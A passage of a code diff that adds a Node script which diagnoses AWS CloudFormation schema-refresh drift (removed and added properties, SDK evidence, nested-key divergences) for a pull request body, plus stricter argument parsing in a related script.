+    'about their contents. Most assert that a type has NO silently dropped',
+    'property — zero headroom, so one writable property AWS adds to that type',
+    'reds CI while the coverage check absorbs the same addition. The rest assert',
+    'a specific rule or subfield list still matches the capture.',
     '',
     '```bash',
-    'vp test run mutually-exclusive-properties ecs-deployment-configuration-subfield ecs-service-config-props',
+    'vp test run \\',
+    '  mutually-exclusive-properties \\',
+    '  ecs-deployment-configuration-subfield \\',
+    '  apigatewayv2-integration-props \\',
+    '  apigatewayv2-stage-route-props \\',
+    '  appsync-graphqlapi-config-props \\',
+    '  appsync-resolver-datasource-props \\',
+    '  ecs-service-config-props',
     '```',
     '',
-    'Each asserts a fact about a specific type. Read what it names and decide',
-    'whether the rule or the assertion is what AWS just invalidated.',
+    'Read what it names and decide whether the rule or the assertion is what AWS',
+    'just invalidated. That command is the workflow\'s own filter list, fenced',
+    'equal to it — a narrower one comes back GREEN over a real red, which is how',
+    'this row was wrong for a round.',
   ],
   'audit:enrichment-coverage:check': [
     'A new computed attribute on a pure Cloud-Control type that',
@@ -1321,8 +1331,8 @@ export function collectFixtureDeltas({
       // `**[name rejected]**` as the heading — the same shape as the two render
       // sites rounds 8 and 9 fixed. The declared-property lookup misses either
       // way, but a legible heading says which type it missed for.
-      resourceType =
-        JSON.parse(committed).resourceType ?? file.replace(/\.json$/, '').replace(/-/g, '::');
+        resourceType =
+          JSON.parse(committed).resourceType ?? file.replace(/\.json$/, '').replace(/-/g, '::');
       } catch {
         // An unparseable side is the refresh's problem, not the report's — but it
         // is COUNTED, because a type that vanishes here vanishes from the removal
@@ -1402,11 +1412,22 @@ export function loadDeclaredProperties(repoRoot = REPO_ROOT) {
 
 function main() {
   const args = process.argv.slice(2);
+  // The third reader, and it was the last one still silent on both counts: a
+  // flag with no value AND a path that does not exist both returned `''`.
+  // `--nested-key-log` is rescued by its `--nested-key-rc` companion, but
+  // `--skipped-log` has none and the section is omitted when empty — so an
+  // unread log was byte-identical to "everything was refreshed".
   const readArg = (/** @type {string} */ flag) => {
     const i = args.indexOf(flag);
-    if (i === -1 || i + 1 >= args.length) return '';
+    if (i === -1) return '';
     const path = args[i + 1];
-    return existsSync(path) ? readFileSync(path, 'utf8') : '';
+    if (path === undefined || path.startsWith('--')) {
+      throw new Error(`${flag} was given with no value — refusing to report from an unread file.`);
+    }
+    if (!existsSync(path)) {
+      throw new Error(`${flag} names ${path}, which does not exist — refusing to report from an unread file.`);
+    }
+    return readFileSync(path, 'utf8');
   };
 
   const providerFiles = mapTypesToProviderFiles(
@@ -1448,8 +1469,11 @@ function main() {
   const readArgValue = (/** @type {string} */ flag) => {
     const i = args.indexOf(flag);
     if (i === -1) return '';
+    // `undefined` is only the TRAILING spelling. A following FLAG is the same
+    // mistake and read as a value: `--failed-checks --skipped-log <f>`
+    // fabricated a failed check named `--skipped-log`.
     const raw = args[i + 1];
-    if (raw === undefined) {
+    if (raw === undefined || raw.startsWith('--')) {
       throw new Error(`${flag} was given with no value — refusing to report from an unread list.`);
     }
     return raw;

--- a/scripts/diagnose-schema-refresh.mjs
+++ b/scripts/diagnose-schema-refresh.mjs
@@ -1,0 +1,788 @@
+#!/usr/bin/env node
+// @ts-check
+
+/**
+ * Explain, in the refresh pull request itself, what a maintainer has to decide.
+ *
+ * `.github/workflows/cfn-schema-refresh.yml` opens a PR whose CI may be RED by
+ * design: the bot runs only the mechanical regeneration, so a property AWS
+ * REMOVED and a nested key AWS ADDED both land as a failing check that no
+ * amount of re-running clears. Before this script the PR said only that such a
+ * class exists; finding out WHICH property, on which type, declared where, meant
+ * opening the CI log and reading two different checkers' output.
+ *
+ * That digging is entirely mechanical, so it is done here. What is NOT done
+ * here is the decision — see {@link renderDiagnosis}'s note and
+ * `docs/schema-refresh-runbook.md`.
+ *
+ * Two facts are contributed that neither checker has.
+ *
+ * 1. Whether a bogus declaration is bogus because **AWS removed the property in
+ *    this refresh**, or was already bogus before it (an SDK-only field name,
+ *    the long-standing `bogusTolerated` class). The checkers see only the
+ *    current fixture; this compares the committed fixture against the refreshed
+ *    one, so the answer is derived rather than guessed.
+ *
+ * 2. Whether the **AWS SDK still models a member of that name**. This is the
+ *    evidence the decision actually turns on: a property gone from the CFn
+ *    schema but still present in the SDK is one the API very likely still
+ *    accepts (keep sending it), while one absent from BOTH models is one both
+ *    of AWS's own descriptions have dropped. It is reported as EVIDENCE, never
+ *    as a verdict — the CFn property name and the SDK member name are not
+ *    always the same string, which is exactly why this repo carries
+ *    hand-maintained rename maps, so a name-level miss can mean "renamed" as
+ *    easily as "removed".
+ *
+ * Usage (from the repo root, AFTER the refresh has written the fixtures):
+ *
+ *   node scripts/diagnose-schema-refresh.mjs \
+ *     [--coverage-log <file>] [--nested-key-log <file>] > body.md
+ *
+ * Emits Markdown on stdout and always exits 0 — a diagnosis that fails must
+ * not take down the PR it is describing.
+ */
+
+import { execFileSync } from 'node:child_process';
+import { readFileSync, readdirSync, existsSync } from 'node:fs';
+import { join, dirname } from 'node:path';
+import { fileURLToPath } from 'node:url';
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const REPO_ROOT = join(__dirname, '..');
+const FIXTURES_DIR = join(REPO_ROOT, 'tests/fixtures/cfn-schemas');
+const PROVIDERS_DIR = join(REPO_ROOT, 'src/provisioning/providers');
+
+/**
+ * Compare one type's committed fixture against its refreshed self.
+ *
+ * Both sides are parsed as JSON rather than read out of a `git diff`, because a
+ * removed line in a diff carries no indication of WHICH array it left — and
+ * `properties`, `readOnlyProperties`, `createOnlyProperties` and
+ * `primaryIdentifier` all hold bare strings. Parsing makes the answer exact.
+ *
+ * @param {string} committedJson
+ * @param {string} refreshedJson
+ * @returns {{removed: string[], added: string[], writableAdded: string[]}}
+ */
+export function comparePropertySets(committedJson, refreshedJson) {
+  const before = JSON.parse(committedJson);
+  const after = JSON.parse(refreshedJson);
+  const beforeProps = Array.isArray(before.properties) ? before.properties : [];
+  const afterProps = Array.isArray(after.properties) ? after.properties : [];
+  const afterReadOnly = new Set(
+    Array.isArray(after.readOnlyProperties) ? after.readOnlyProperties : []
+  );
+  const removed = beforeProps.filter((/** @type {string} */ p) => !afterProps.includes(p));
+  const added = afterProps.filter((/** @type {string} */ p) => !beforeProps.includes(p));
+  return {
+    removed,
+    added,
+    // Read-only additions can never become a silent drop — the coverage
+    // generator skips them — so they are separated out rather than reported as
+    // work.
+    writableAdded: added.filter((/** @type {string} */ p) => !afterReadOnly.has(p)),
+  };
+}
+
+/**
+ * Blocking divergences from `audit:nested-key-coverage:check`'s output.
+ *
+ * The checker's own lines are the source of truth and are quoted verbatim into
+ * the report; only the type and the bucket are pulled out, for grouping. Lines
+ * it does not recognise are ignored rather than guessed at.
+ *
+ * **Refuses to return nothing from output that says it FAILED.** The checker's
+ * finding-line format lives in another file and nothing fences the two, so a
+ * wording change there would make this parser return `[]` and the pull request
+ * would render "nothing needs a decision" over a red check — the same
+ * silent-empty class {@link parseDeclaredProperties} already refuses for its own
+ * input, and the failure this whole job exists to prevent, one level up.
+ *
+ * @param {string} checkOutput
+ * @returns {Array<{resourceType: string, bucket: string, line: string}>}
+ */
+export function parseNestedKeyDivergences(checkOutput) {
+  /** @type {Array<{resourceType: string, bucket: string, line: string}>} */
+  const out = [];
+  for (const raw of checkOutput.split('\n')) {
+    const line = raw.trim();
+    const m = /^(AWS::[A-Za-z0-9]+::[A-Za-z0-9]+):\s.*\[([a-z-]+)\]/.exec(line);
+    if (!m) continue;
+    out.push({ resourceType: m[1], bucket: m[2], line });
+  }
+  if (out.length === 0 && /nested-key-coverage:\s*FAIL/i.test(checkOutput)) {
+    throw new Error(
+      'audit:nested-key-coverage:check reported FAIL but no finding line parsed — ' +
+        'its output format changed. Refusing to report "nothing needs a decision" ' +
+        'over a failing check.'
+    );
+  }
+  return out;
+}
+
+/**
+ * Map each registered resource type to the provider FILE that serves it.
+ *
+ * Parsed from `register-providers.ts`, which is the only place that binding
+ * exists: a type is registered either with a fresh instance
+ * (`registry.register('AWS::X::Y', new FooProvider())`) or with a shared local
+ * (`const p = new FooProvider(); registry.register('AWS::X::Y', p)`), and both
+ * resolve back to the class, which the file's own imports resolve to a path.
+ *
+ * Without this the diagnosis grepped every provider for the property NAME, and
+ * for a common one the result was worse than useless — measured on real drift,
+ * `Id` matched 50+ lines across 20 files, and the SDK client was then read off
+ * whichever file sorted first, so `AWS::CodeCommit::Repository.Id` was reported
+ * against `@aws-sdk/client-cloudfront`. A confident wrong answer is the one
+ * outcome this report must not produce.
+ *
+ * @param {string} source `register-providers.ts` contents
+ * @returns {Map<string, string>} resource type -> repo-relative provider path
+ */
+export function mapTypesToProviderFiles(source) {
+  /** @type {Map<string, string>} */
+  const classToPath = new Map();
+  for (const m of source.matchAll(/import\s*\{([^}]+)\}\s*from\s*'\.\/(providers\/[a-z0-9-]+)\.js'/g)) {
+    for (const name of m[1].split(',').map((n) => n.trim()).filter(Boolean)) {
+      classToPath.set(name, `src/provisioning/${m[2]}.ts`);
+    }
+  }
+  /** @type {Map<string, string>} */
+  const localToClass = new Map();
+  for (const m of source.matchAll(/const\s+([A-Za-z0-9_]+)\s*=\s*new\s+([A-Za-z0-9_]+)\(/g)) {
+    localToClass.set(m[1], m[2]);
+  }
+  /** @type {Map<string, string>} */
+  const out = new Map();
+  for (const m of source.matchAll(
+    /registry\.register\(\s*'([A-Z][\w:]+)'\s*,\s*(?:new\s+([A-Za-z0-9_]+)\(|([A-Za-z0-9_]+))/g
+  )) {
+    const cls = m[2] ?? localToClass.get(m[3] ?? '');
+    const path = cls ? classToPath.get(cls) : undefined;
+    if (path) out.set(m[1], path);
+  }
+  return out;
+}
+
+/**
+ * Lines in the provider file that mention a property name, scoped to the block
+ * declaring THIS resource type.
+ *
+ * The scoping matters because a provider file routinely serves several types —
+ * measured, 17 of 78 do, and `ec2-provider.ts` serves 15. Without it, asking
+ * about `Tags` on `AWS::Glue::Connection` returns every `'Tags'` in
+ * `glue-provider.ts`, including the declarations belonging to Glue::Job and
+ * Glue::Table. Not a false claim (they are labelled candidates) but noise that
+ * points the reader at the wrong lines.
+ *
+ * The block is delimited by the type's own literal and the next `'AWS::`
+ * literal in the file, which is the shape `handledProperties` /
+ * `unhandledByDesign` maps take. That is a heuristic, not a parse — so when the
+ * type's literal is absent the whole file is searched rather than returning
+ * nothing, and the caller says "candidates" either way.
+ *
+ * @param {string} property
+ * @param {string | undefined} providerRelPath
+ * @param {string} [resourceType]
+ * @param {string} [repoRoot]
+ * @returns {string[]} `file:line` strings
+ */
+export function findDeclarationCandidates(
+  property,
+  providerRelPath,
+  resourceType,
+  repoRoot = REPO_ROOT
+) {
+  if (!providerRelPath) return [];
+  const abs = join(repoRoot, providerRelPath);
+  if (!existsSync(abs)) return [];
+  const lines = readFileSync(abs, 'utf8').split('\n');
+
+  let from = 0;
+  let to = lines.length;
+  if (resourceType) {
+    const start = lines.findIndex((l) => l.includes(`'${resourceType}'`));
+    if (start !== -1) {
+      from = start;
+      const next = lines.findIndex(
+        (l, i) => i > start && /'AWS::[A-Za-z0-9]+::[A-Za-z0-9]+'/.test(l)
+      );
+      to = next === -1 ? lines.length : next;
+    }
+  }
+
+  /** @type {string[]} */
+  const hits = [];
+  for (let i = from; i < to; i++) {
+    if (lines[i].includes(`'${property}'`) || lines[i].includes(`"${property}"`)) {
+      hits.push(`${providerRelPath}:${i + 1}`);
+    }
+  }
+  return hits;
+}
+
+/**
+ * Whether any AWS SDK client this type's provider uses still models a member of
+ * this name, case-insensitively.
+ *
+ * **Case-insensitive is load-bearing, not tidiness.** AWS SDK v3 wire models are
+ * camelCase for several services: `@aws-sdk/client-api-gateway` spells
+ * `restApiId` and carries no PascalCase spelling anywhere in `dist-types/models`,
+ * so a case-sensitive scan reported `RestApiId` as "no longer modelled" — a
+ * false claim whose lean is toward DELETING a live declaration, the one
+ * direction this evidence must never push. The repo's own nested-key machinery
+ * has a `case-divergence` bucket precisely because CFn and SDK capitalisation
+ * routinely differ.
+ *
+ * **Every imported client is consulted, not the first.** 14 provider files
+ * import two to four clients, and reading the first one is the "confident wrong
+ * answer" defect this report already had once (a repo-wide name lookup
+ * attributed CodeCommit evidence to `@aws-sdk/client-cloudfront`). Today each
+ * file happens to list its primary client first, so a first-import rule is only
+ * coincidentally right and an import reformat would flip it silently.
+ * Consulting all of them biases toward "still modelled" — i.e. toward NOT
+ * encouraging a deletion, which is the safe direction for this question.
+ *
+ * A property name carrying anything but letters and digits returns `undefined`
+ * rather than a scrubbed needle: silently rewriting the thing being searched
+ * for is how a lookup answers a question nobody asked.
+ *
+ * This is a NAME-PRESENCE scan, not the typed interface walk
+ * `gen-nested-key-coverage.ts` performs — the right strength for "has AWS's
+ * other description of this service dropped the name too?", and the wrong tool
+ * for deciding anything, which is why the caller renders it as evidence.
+ *
+ * @param {string} property
+ * @param {string | undefined} providerRelPath
+ * @param {string} [repoRoot]
+ * @returns {{client: string, modelled: boolean, version?: string, consulted?: string[]} | undefined}
+ *   `undefined` when no client could be determined — the honest answer, not a guess
+ */
+export function sdkModelsMember(property, providerRelPath, repoRoot = REPO_ROOT) {
+  if (!providerRelPath) return undefined;
+  if (!/^[A-Za-z0-9]+$/.test(property)) return undefined;
+  const abs = join(repoRoot, providerRelPath);
+  if (!existsSync(abs)) return undefined;
+  const clients = [
+    ...new Set(
+      [...readFileSync(abs, 'utf8').matchAll(/from '(@aws-sdk\/client-[a-z0-9-]+)'/g)].map(
+        (m) => m[1]
+      )
+    ),
+  ];
+  if (clients.length === 0) return undefined;
+
+  const needle = new RegExp(`\\b${property}\\b`, 'i');
+  /** @type {string | undefined} */
+  let firstVersion;
+  /** @type {string[]} */
+  const consulted = [];
+  for (const client of clients) {
+    const modelsDir = join(repoRoot, 'node_modules', client, 'dist-types/models');
+    if (!existsSync(modelsDir)) continue;
+    consulted.push(client);
+    let version;
+    try {
+      version = JSON.parse(
+        readFileSync(join(repoRoot, 'node_modules', client, 'package.json'), 'utf8')
+      ).version;
+    } catch {
+      version = undefined;
+    }
+    firstVersion ??= version;
+    for (const file of readdirSync(modelsDir).filter((f) => f.endsWith('.d.ts'))) {
+      if (needle.test(readFileSync(join(modelsDir, file), 'utf8'))) {
+        return { client, modelled: true, version, consulted };
+      }
+    }
+  }
+  if (consulted.length === 0) return undefined;
+  return { client: consulted[0], modelled: false, version: firstVersion, consulted };
+}
+
+/**
+ * Whether the installed SDK client is behind what npm publishes.
+ *
+ * This settles ONE branch of the divergence decision outright: if the installed
+ * client is already the latest, "the SDK merely lags the service" is eliminated
+ * and the remaining reading is that the service genuinely lacks the member.
+ * When it IS behind, the honest answer is "bump and re-check" — NOT "bumping
+ * would fix it", which cannot be answered by a name lookup. Measured while
+ * building this: the four live `AWS::Glue::Connection` divergences carry names
+ * that ARE present in both the installed and the latest client, because the
+ * checker's finding is about a specific INTERFACE's members, not about the name
+ * existing somewhere. A grep-level "the newer SDK has it" would have
+ * contradicted the checker and been wrong.
+ *
+ * Network-dependent by nature, so every failure degrades to `undefined` and the
+ * caller simply says nothing — a diagnosis must never fail the job it describes.
+ *
+ * @param {string} client
+ * @param {string | undefined} installed
+ * @param {(pkg: string) => string} [viewLatest] injectable for tests
+ * @returns {{installed: string, latest: string, behind: boolean} | undefined}
+ */
+export function sdkVersionLag(client, installed, viewLatest = defaultViewLatest) {
+  if (!installed) return undefined;
+  let latest;
+  try {
+    latest = viewLatest(client).trim();
+  } catch {
+    return undefined;
+  }
+  if (!/^\d+\.\d+\.\d+/.test(latest)) return undefined;
+  return { installed, latest, behind: latest !== installed };
+}
+
+/** @param {string} pkg @returns {string} */
+function defaultViewLatest(pkg) {
+  return execFileSync('npm', ['view', pkg, 'version'], {
+    encoding: 'utf8',
+    timeout: 20_000,
+    stdio: ['ignore', 'pipe', 'ignore'],
+  });
+}
+
+/**
+ * Each type's DECLARED property set, read from the generated coverage module.
+ *
+ * `gen-property-coverage.ts` writes `handled` VERBATIM from the provider's
+ * declaration and does not intersect it with the fixture, so a property AWS has
+ * just removed is still listed — which is exactly the "this declaration is now
+ * bogus" condition the caller filters on.
+ *
+ * **Returns an empty map only for empty input, and throws on a parse that finds
+ * nothing in a non-empty module.** A silent empty here would filter EVERY
+ * removal away and render "nothing needs a decision" over a PR that does — the
+ * failure direction this whole job exists to prevent, one level up. It was live
+ * for one revision: the module writes `new Set<string>([`, the pattern expected
+ * `new Set([`, and the report came back clean against real drift carrying a
+ * known-bogus declaration.
+ *
+ * @param {string} generatedSource
+ * @returns {Map<string, Set<string>>}
+ */
+export function parseDeclaredProperties(generatedSource) {
+  /** @type {Map<string, Set<string>>} */
+  const declared = new Map();
+  if (generatedSource.trim() === '') return declared;
+  for (const m of generatedSource.matchAll(
+    /\[\s*'([A-Z][\w:]+)'\s*,\s*\{[\s\S]*?handled:\s*new Set(?:<[^>]*>)?\(\[([\s\S]*?)\]\)/g
+  )) {
+    declared.set(m[1], new Set([...m[2].matchAll(/'([^']+)'/g)].map((x) => x[1])));
+  }
+  if (declared.size === 0) {
+    throw new Error(
+      'property-coverage.generated.ts parsed to zero types — the shape changed. ' +
+        'Refusing to report "nothing needs a decision" from a parse that found nothing.'
+    );
+  }
+  return declared;
+}
+
+/**
+ * Render the Markdown appended to the pull-request body.
+ *
+ * It NAMES what fired, where, and what the SDK says about it — then stops.
+ *
+ * The stopping point is narrower than it first looks, and the earlier framing
+ * of it here was wrong: "the tiebreaker is in neither model" ignored that AWS
+ * publishes a THIRD description, the SDK, which this repo already reads. So the
+ * research IS largely mechanical and is now done above; what is left to a human
+ * is confirmation plus the cases the evidence cannot separate — a rename looks
+ * exactly like a removal at the name level (hence this repo's hand-maintained
+ * rename maps), and `no-sdk-member` cannot tell "unsupported" from "the
+ * installed SDK lags the service".
+ *
+ * The reason to stop there is the asymmetry rather than the ambiguity: the
+ * silencing option (`bogusTolerated`, `NESTED_KEY_ALLOW_LIST`) is always
+ * available and always turns CI green, so anything choosing automatically under
+ * uncertainty converges on it — disabling the very check that caught the
+ * problem, silently. Evidence shortens the human's work; it does not change who
+ * accepts that risk.
+ *
+ * @param {object} input
+ * @param {Array<{resourceType: string, properties: string[], candidates: Record<string, string[]>, sdk?: Record<string, {client: string, modelled: boolean, version?: string} | undefined>, renameCandidates?: Record<string, string[]>}>} input.removed
+ * @param {Array<{resourceType: string, properties: string[]}>} input.writableAdded
+ * @param {number} [input.readOnlyAddedCount]
+ * @param {{client: string, installed: string, latest: string, behind: boolean}} [input.sdkLag]
+ * @param {Array<{resourceType: string, bucket: string, line: string}>} input.divergences
+ * @param {string[]} input.skipped
+ * @returns {string}
+ */
+export function renderDiagnosis({
+  removed,
+  writableAdded,
+  readOnlyAddedCount = 0,
+  divergences,
+  skipped,
+  sdkLag,
+}) {
+  const lines = ['## What changed, and what needs a decision', ''];
+
+  if (removed.length === 0 && divergences.length === 0) {
+    lines.push('Nothing in this refresh needs a decision — additions only.', '');
+  }
+
+  if (removed.length > 0) {
+    lines.push(
+      '### Properties AWS removed — a decision is needed',
+      '',
+      'Each was in the previous snapshot, is not in this one, AND is declared by',
+      'the provider — so the declaration is now bogus. Removals nothing declares',
+      'are not listed: they change nothing.',
+      ''
+    );
+    for (const entry of removed) {
+      lines.push(`- \`${entry.resourceType}\``);
+      for (const property of entry.properties) {
+        const candidates = entry.candidates[property] ?? [];
+        const where =
+          candidates.length === 0
+            ? 'no declaration found in the provider sources'
+            : `declared near ${candidates.map((c) => `\`${c}\``).join(', ')}`;
+        lines.push(`  - \`${property}\` — ${where}`);
+
+        // A RENAME shows up as a removal and an addition on the SAME type in
+        // the SAME refresh, and both sides are in hand — so say so rather than
+        // leaving the reader to spot it. This is the single most decisive
+        // signal in the report when it fires.
+        const renames = entry.renameCandidates?.[property] ?? [];
+        if (renames.length > 0) {
+          lines.push(
+            `    - **Likely a RENAME**: this refresh also ADDED ` +
+              `${renames.map((r) => `\`${r}\``).join(', ')} to the same type. If so, ` +
+              'update the declaration to the new name rather than retiring it.'
+          );
+        }
+
+        const sdk = entry.sdk?.[property];
+        if (sdk === undefined) {
+          lines.push('    - SDK evidence: none — could not determine the client to consult');
+        } else if (sdk.modelled) {
+          lines.push(
+            `    - SDK evidence: \`${sdk.client}\`${
+              sdk.version ? ` (${sdk.version})` : ''
+            } **still models this name** (case-insensitively), so the API likely ` +
+              'still accepts it — leans toward keeping it (`bogusTolerated`)'
+          );
+        } else {
+          lines.push(
+            `    - SDK evidence: \`${sdk.client}\`${
+              sdk.version ? ` (${sdk.version})` : ''
+            } **no longer models this name**, searched case-insensitively across ` +
+              `${(sdk.consulted ?? [sdk.client]).length} client(s) — both of AWS's ` +
+              'descriptions have dropped it, which leans toward retiring the ' +
+              'declaration. A rename would look identical here.'
+          );
+        }
+      }
+    }
+    lines.push('', ...removedProcedure(removed), '');
+  }
+
+  if (divergences.length > 0) {
+    lines.push(
+      '### Nested-key divergences — a decision is needed',
+      '',
+      'Reported by the nested-key check, which reports divergences rather than',
+      'staleness, so regenerating will not clear these.',
+      ''
+    );
+    for (const d of divergences) {
+      lines.push(`- \`${d.line}\``);
+    }
+    lines.push('', ...divergenceProcedure(divergences, sdkLag), '');
+  }
+
+  if (writableAdded.length > 0) {
+    const count = writableAdded.reduce((n, e) => n + e.properties.length, 0);
+    lines.push(
+      `### Writable properties AWS added (${count}) — no decision needed`,
+      '',
+      'These route through Cloud Control automatically once this merges. They are',
+      'posted to the standing backfill issue too; wiring them into an SDK provider',
+      'is separate work.',
+      ''
+    );
+    for (const entry of writableAdded) {
+      lines.push(
+        `- \`${entry.resourceType}\`: ${entry.properties.map((p) => `\`${p}\``).join(', ')}`
+      );
+    }
+    lines.push('');
+  }
+
+  if (readOnlyAddedCount > 0) {
+    // Named even though there is nothing to do, because they ARE visible in the
+    // fixture diff and an unexplained change invites a reader to go looking.
+    lines.push(
+      `### Read-only properties AWS added (${readOnlyAddedCount}) — nothing to do`,
+      '',
+      'Visible in the fixture diff, but AWS computes and returns these; there is',
+      'nothing for a provider to send, so they can never be a dropped value.',
+      ''
+    );
+  }
+
+  if (skipped.length > 0) {
+    lines.push(
+      '### Not refreshed',
+      '',
+      'No entry in the public bundle; these keep the authenticated path as their',
+      'only refresh route and were left untouched.',
+      '',
+      ...skipped.map((t) => `- \`${t}\``),
+      ''
+    );
+  }
+
+  lines.push(
+    '_The choice itself is deliberately not made here: both options in each case',
+    'turn CI green and mean opposite things for a user’s template, and the',
+    'silencing one always works — so anything choosing automatically under',
+    'uncertainty converges on disabling the check. See the_',
+    '_[CFn schema refresh runbook](https://github.com/go-to-k/cdkd/blob/main/docs/schema-refresh-runbook.md)._'
+  );
+  return lines.join('\n');
+}
+
+/**
+ * The steps that actually settle a removed-property case.
+ *
+ * Written as commands rather than as advice: a report that classifies without
+ * saying what to run has not handed the work over, it has handed over a
+ * question. Each line is something the reader can paste.
+ *
+ * @param {Array<{resourceType: string, properties: string[]}>} removed
+ * @returns {string[]}
+ */
+function removedProcedure(removed) {
+  const first = removed[0];
+  const type = first?.resourceType ?? 'AWS::Service::Type';
+  const property = first?.properties[0] ?? 'PropertyName';
+  return [
+    '<details><summary>How to settle these</summary>',
+    '',
+    '1. If a **RENAME** is flagged above, take that: point the declaration at the',
+    '   new name. Nothing else is needed.',
+    '2. Otherwise confirm against the live registry — this is the API AWS serves,',
+    '   not the published bundle:',
+    '',
+    '   ```bash',
+    `   aws cloudformation describe-type --type RESOURCE --type-name '${type}' \\`,
+    "     --query Schema --output text | jq -r '.properties | keys[]' | grep -i " +
+      `'${property}'`,
+    '   ```',
+    '',
+    '3. If the SDK evidence says the name is gone AND step 2 finds nothing, the',
+    '   property is genuinely retired — delete the declaration from the provider.',
+    '4. If either still knows the name, keep sending it: add the property to',
+    '   `bogusTolerated` in `tests/fixtures/cfn-schemas/_todo-backfill.json` with a',
+    '   one-line reason (why the CFn schema no longer lists it, and why cdkd still',
+    '   sends it).',
+    '5. Re-run `vp test run property-coverage` — it names any entry still bogus.',
+    '',
+    '</details>',
+  ];
+}
+
+/**
+ * The steps that settle a nested-key divergence, including the one question the
+ * evidence cannot answer on its own: whether the installed SDK simply lags.
+ *
+ * @param {Array<{resourceType: string, bucket: string, line: string}>} divergences
+ * @returns {string[]}
+ */
+function divergenceProcedure(divergences, lag) {
+  const hasMissing = divergences.some((d) => d.bucket !== 'case-divergence');
+  /** @type {string[]} */
+  const lagLines = [];
+  if (hasMissing && lag) {
+    lagLines.push(
+      '',
+      lag.behind
+        ? `**The installed \`${lag.client}\` is ${lag.installed}; npm publishes ` +
+          `${lag.latest}.** The SDK-lag reading is LIVE — bump and re-check before ` +
+          'allow-listing anything.'
+        : `**The installed \`${lag.client}\` is ${lag.installed}, which is current.** ` +
+          'The SDK-lag reading is ruled out; what remains is that the service ' +
+          'genuinely lacks the member.',
+      ''
+    );
+  }
+  return [
+    '<details><summary>How to settle these</summary>',
+    '',
+    '1. A `case-divergence` means the SDK models the key under a different',
+    '   capitalisation — rename it in the provider. There is no judgement here.',
+    ...lagLines,
+    ...(hasMissing
+      ? [
+          '2. For `no-sdk-member` / `definition-member-missing`, first rule out the',
+          '   installed SDK simply lagging the service:',
+          '',
+          '   ```bash',
+          '   # Compare what is installed against what npm publishes today.',
+          '   node -p "require(\'@aws-sdk/client-<service>/package.json\').version"',
+          '   npm view @aws-sdk/client-<service> version',
+          '   ```',
+          '',
+          '   If a newer version exists, bump it and re-run',
+          '   `vp run audit:nested-key-coverage:check` before deciding — an',
+          '   allow-list entry added over an SDK lag hides a real dropped value.',
+          '3. If the SDK is current and still lacks the member, confirm the service',
+          '   API genuinely has no such field (its API reference), then add a',
+          '   `NESTED_KEY_ALLOW_LIST` entry in',
+          '   `scripts/gen-nested-key-coverage.ts` with a one-line reason.',
+        ]
+      : []),
+    '',
+    '</details>',
+  ];
+}
+
+/**
+ * Read a type's committed fixture from git, or `undefined` when it is new.
+ *
+ * @param {string} relPath
+ * @returns {string | undefined}
+ */
+function committedVersion(relPath) {
+  try {
+    return execFileSync('git', ['show', `HEAD:${relPath}`], {
+      cwd: REPO_ROOT,
+      encoding: 'utf8',
+      maxBuffer: 32 * 1024 * 1024,
+    });
+  } catch {
+    return undefined;
+  }
+}
+
+function main() {
+  const args = process.argv.slice(2);
+  const readArg = (/** @type {string} */ flag) => {
+    const i = args.indexOf(flag);
+    if (i === -1 || i + 1 >= args.length) return '';
+    const path = args[i + 1];
+    return existsSync(path) ? readFileSync(path, 'utf8') : '';
+  };
+
+  const providerFiles = mapTypesToProviderFiles(
+    readFileSync(join(REPO_ROOT, 'src/provisioning/register-providers.ts'), 'utf8')
+  );
+
+  // Which properties each provider DECLARES. A removal only needs a decision
+  // when something declares the property — otherwise the property leaving the
+  // schema changes nothing and reporting it is pure noise. Measured on real
+  // drift before this filter: 5 removals reported, of which 4 were `Id` on
+  // types no provider declares it for.
+  //
+  // Read from the generated coverage module rather than re-parsing providers:
+  // `gen-property-coverage.ts` writes `handled` VERBATIM from the declaration
+  // and does not intersect it with the fixture, so a property AWS just removed
+  // is still listed there — which is exactly the "now bogus" condition.
+  const declared = parseDeclaredProperties(
+    existsSync(join(REPO_ROOT, 'src/provisioning/property-coverage.generated.ts'))
+      ? readFileSync(join(REPO_ROOT, 'src/provisioning/property-coverage.generated.ts'), 'utf8')
+      : ''
+  );
+
+  /** @type {Array<{resourceType: string, properties: string[], candidates: Record<string, string[]>, sdk: Record<string, {client: string, modelled: boolean} | undefined>}>} */
+  const removed = [];
+  /** @type {Array<{resourceType: string, properties: string[]}>} */
+  const writableAdded = [];
+  let readOnlyAddedCount = 0;
+
+  for (const file of readdirSync(FIXTURES_DIR).filter(
+    (f) => f.endsWith('.json') && !f.startsWith('_')
+  )) {
+    const relPath = `tests/fixtures/cfn-schemas/${file}`;
+    const committed = committedVersion(relPath);
+    if (committed === undefined) continue; // Brand-new fixture: nothing to compare.
+    let delta;
+    let resourceType;
+    try {
+      delta = comparePropertySets(committed, readFileSync(join(FIXTURES_DIR, file), 'utf8'));
+      resourceType = JSON.parse(committed).resourceType ?? file;
+    } catch {
+      continue; // An unparseable side is the refresh's problem, not the report's.
+    }
+
+    readOnlyAddedCount += delta.added.length - delta.writableAdded.length;
+
+    const providerRelPath = providerFiles.get(resourceType);
+    const declaredHere = declared.get(resourceType) ?? new Set();
+    const actionable = delta.removed.filter((/** @type {string} */ p) => declaredHere.has(p));
+    if (actionable.length > 0) {
+      /** @type {Record<string, string[]>} */
+      const candidates = {};
+      /** @type {Record<string, {client: string, modelled: boolean, version?: string} | undefined>} */
+      const sdk = {};
+      /** @type {Record<string, string[]>} */
+      const renameCandidates = {};
+      for (const property of actionable) {
+        candidates[property] = findDeclarationCandidates(property, providerRelPath, resourceType);
+        sdk[property] = sdkModelsMember(property, providerRelPath);
+        // The WRITABLE additions to the same type — not every addition. A
+        // declaration cannot target a read-only property (the coverage
+        // generator skips read-only when building the silent-drop set), so
+        // pairing a removal with a read-only addition would advise "point the
+        // declaration at the new name" and produce the next bogus entry.
+        renameCandidates[property] = delta.writableAdded;
+      }
+      removed.push({ resourceType, properties: actionable, candidates, sdk, renameCandidates });
+    }
+    if (delta.writableAdded.length > 0) {
+      writableAdded.push({ resourceType, properties: delta.writableAdded });
+    }
+  }
+
+  const divergences = parseNestedKeyDivergences(readArg('--nested-key-log'));
+  const skipped = readArg('--skipped-log')
+    .split('\n')
+    .map((l) => l.trim())
+    .filter((l) => /^AWS::/.test(l));
+
+  // Version lag is asked only when a divergence needs it, and only for the
+  // client of the first divergent type — one network call, never on the happy
+  // path, and its failure is silent by construction.
+  /** @type {{client: string, installed: string, latest: string, behind: boolean} | undefined} */
+  let sdkLag;
+  const firstDivergent = divergences.find((d) => d.bucket !== 'case-divergence');
